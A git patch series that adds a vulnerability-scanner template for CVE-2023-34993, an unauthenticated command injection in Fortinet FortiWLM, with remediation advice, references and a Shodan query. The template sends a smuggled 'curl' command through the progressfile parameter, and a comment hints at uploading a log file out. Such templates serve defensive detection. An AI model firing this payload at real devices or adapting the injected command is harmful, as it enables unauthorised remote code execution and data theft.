From aad69a8d8d2d374dbf7cdc904299b869dddf8a2e Mon Sep 17 00:00:00 2001
From: Dwi Siswanto <me@dw1.io>
Date: Thu, 14 Mar 2024 21:28:41 +0700
Subject: [PATCH 1/5] feat(http): add CVE-2023-34993

Signed-off-by: Dwi Siswanto <me@dw1.io>
---
 http/cves/2023/CVE-2023-34993.yaml | 35 ++++++++++++++++++++++++++++++
 1 file changed, 35 insertions(+)
 create mode 100644 http/cves/2023/CVE-2023-34993.yaml

diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml
new file mode 100644
index 0000000000..05cbed11a5
--- /dev/null
+++ b/http/cves/2023/CVE-2023-34993.yaml
@@ -0,0 +1,35 @@
+id: CVE-2023-34993
+
+info:
+  name: Fortinet FortiWLM Unauthenticated Command Injection Vulnerability
+  author: dwisiswant0
+  severity: critical
+  description: |
+    A improper neutralization of special elements used in an os command ('os
+    command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and
+    8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands
+    Successful exploitation of this vulnerability could allow an attacker to
+    bypass authentication and gain unauthorized access to the affected system.
+  remediation: |
+    For FortiWLM version 8.6.0 through 8.6.5 upgrade to version >= 8.6.6.
+    For FortiWLM version 8.5.0 through 8.5.4 upgrade to version >= 8.5.5.
+  reference:
+    - https://fortiguard.com/psirt/FG-IR-23-140
+  metadata:
+    max-request: 1
+    vendor: fortinet
+    product: fortiwlm
+  tags: cve,cve2023,fortinet,fortiwlm,rce,unauth
+
+variables:
+  progressfile: '/tmp/{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}"
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"

From 71679c45e4fd0ff0dd156f1513c0bc87a9420b2b Mon Sep 17 00:00:00 2001
From: Dwi Siswanto <me@dw1.io>
Date: Thu, 14 Mar 2024 21:31:18 +0700
Subject: [PATCH 2/5] docs(http): add missing ref for CVE-2023-34993

Signed-off-by: Dwi Siswanto <me@dw1.io>
---
 http/cves/2023/CVE-2023-34993.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml
index 05cbed11a5..14c31acf20 100644
--- a/http/cves/2023/CVE-2023-34993.yaml
+++ b/http/cves/2023/CVE-2023-34993.yaml
@@ -15,6 +15,7 @@ info:
     For FortiWLM version 8.5.0 through 8.5.4 upgrade to version >= 8.5.5.
   reference:
     - https://fortiguard.com/psirt/FG-IR-23-140
+    - https://www.horizon3.ai/attack-research/attack-blogs/fortiwlm-the-almost-story-for-the-forti-forty/
   metadata:
     max-request: 1
     vendor: fortinet

From d4784b936de5a14ad5b528742d84d6d05c5c70e4 Mon Sep 17 00:00:00 2001
From: Dwi Siswanto <me@dw1.io>
Date: Thu, 21 Mar 2024 08:35:45 +0700
Subject: [PATCH 3/5] feat(http): add word matcher for CVE-2023-34993

Co-authored-by: DhiyaneshGeek <dhiyaneshgeek@users.noreply.github.com>
Signed-off-by: Dwi Siswanto <me@dw1.io>
---
 http/cves/2023/CVE-2023-34993.yaml | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml
index 14c31acf20..d1d99c9c10 100644
--- a/http/cves/2023/CVE-2023-34993.yaml
+++ b/http/cves/2023/CVE-2023-34993.yaml
@@ -33,4 +33,9 @@ http:
       - type: word
         part: interactsh_protocol
         words:
-          - "dns"
+          - "http"
+
+      - type: word
+        part: interactsh_request
+        words:
+          - "User-Agent: curl"

From 428de33322d632b633c349c633f709094e0c5b3a Mon Sep 17 00:00:00 2001
From: Dwi Siswanto <git@dw1.io>
Date: Thu, 28 Mar 2024 19:10:50 +0700
Subject: [PATCH 4/5] refactor(http): remove `/tmp` path in `progressfile` var

assumes that the `$systemTempDir` val is `/tmp`

Signed-off-by: Dwi Siswanto <git@dw1.io>
---
 http/cves/2023/CVE-2023-34993.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml
index d1d99c9c10..86a2344a22 100644
--- a/http/cves/2023/CVE-2023-34993.yaml
+++ b/http/cves/2023/CVE-2023-34993.yaml
@@ -23,7 +23,7 @@ info:
   tags: cve,cve2023,fortinet,fortiwlm,rce,unauth
 
 variables:
-  progressfile: '/tmp/{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log"
+  progressfile: '{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log"
 
 http:
   - method: GET

From 8e29306c16451f7edeb2b89164fc639b21153152 Mon Sep 17 00:00:00 2001
From: Dwi Siswanto <git@dw1.io>
Date: Thu, 28 Mar 2024 19:12:22 +0700
Subject: [PATCH 5/5] feat(http): add shodan query metadata for CVE-2023-34993

Signed-off-by: Dwi Siswanto <git@dw1.io>
---
 http/cves/2023/CVE-2023-34993.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml
index 86a2344a22..7f2a3ee849 100644
--- a/http/cves/2023/CVE-2023-34993.yaml
+++ b/http/cves/2023/CVE-2023-34993.yaml
@@ -20,6 +20,7 @@ info:
     max-request: 1
     vendor: fortinet
     product: fortiwlm
+    shodan-query: http.title:"FortiWLM"
   tags: cve,cve2023,fortinet,fortiwlm,rce,unauth
 
 variables: